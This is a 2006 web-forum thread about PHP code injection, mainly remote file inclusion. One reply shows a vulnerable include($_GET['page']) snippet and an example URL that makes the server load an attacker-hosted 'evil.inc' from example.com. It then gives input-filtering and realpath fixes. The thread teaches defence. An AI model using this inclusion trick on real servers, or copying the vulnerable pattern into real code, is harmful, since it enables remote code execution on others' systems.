Page 1 of 1

PHP Injection

Posted: Sun Apr 02, 2006 12:21 am
by fambi
Hi everyone,

I'm new to the forum and thank you all for providing this security forum.

I can appreciate the idea of some malicious user injecting script into my html, or modifying my sql's with an sql injection, but is it possible for someone to inject php code using an unfiltered textarea (for example)?

Thanks.

Posted: Sun Apr 02, 2006 12:43 am
by feyd
possible yes, but for your scripts to actually run that it, you'd need some very specific code. eval() would have to be used, most likely. Although if you save data into a file and can be tricked into loading that file, that will do it too.

Posted: Sun Apr 02, 2006 12:55 am
by fambi
Thanks feyd.

(To keep threads on topic, i've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would be also appreciated.)

Posted: Mon Apr 03, 2006 8:34 am
by Maugrim_The_Reaper
If allow_url_fopen is enabled in your php.ini configuration, include() and require() calls can also accept a URL to the file to include. If this is possible, allowing an unfiltered/unvalidated variable to be a prepend to an include path can result in an attacker exploiting this remote capability to point the include request to a remote file they themselves have written. This is even more dangerous is they know enough information to be capable of accurately guessing your webroot and lower directory paths.

Simple example:

You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).

Code: Select all

// load database connection

if(isset($_GET['page']) && !empty($_GET['page'])) {
	include($_GET['page'] . '.inc');
} else {
	include('index.inc');
}

exit;
Now the attacker could simple store a PHP file called "evil.inc" at http://example.com/evil.inc and call the request (to your script):

http://www.yourserver.com/index.php?pag ... m/evil.inc

Result?

You include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.

Fix?

Check all user variables.

Code: Select all

// load database connection

$clean = array(); // store filtered variables separately

// filter, filter, filter - check all characters are alphabetical (no colons, slashes, periods...)
if(isset($_GET['page']) && !empty($_GET['page']) && ctype_alpha($_GET['page'])) {
	$clean['page'] = $_GET['page'];
} else {
	$clean['page'] = 'index';
}

if($clean['page']) include($clean['page'] . '.inc');

exit;
The solution here is to only allow alphabetic characters in the values - negating slash/period/colon characters means no url will be accepted to taint our script...

Posted: Mon Apr 03, 2006 9:02 am
by fambi
Thanks for the input.

Posted: Mon Apr 03, 2006 9:04 am
by timvw
- I usually build up a $filelocation that contains the page location.
- Then i check if the file exists and if it's readable.
- Then i check if the realpath of the location is a subpath of my $base_path (avoid most of the ../ tricks).

Posted: Mon Apr 03, 2006 9:05 am
by fambi
Thanks.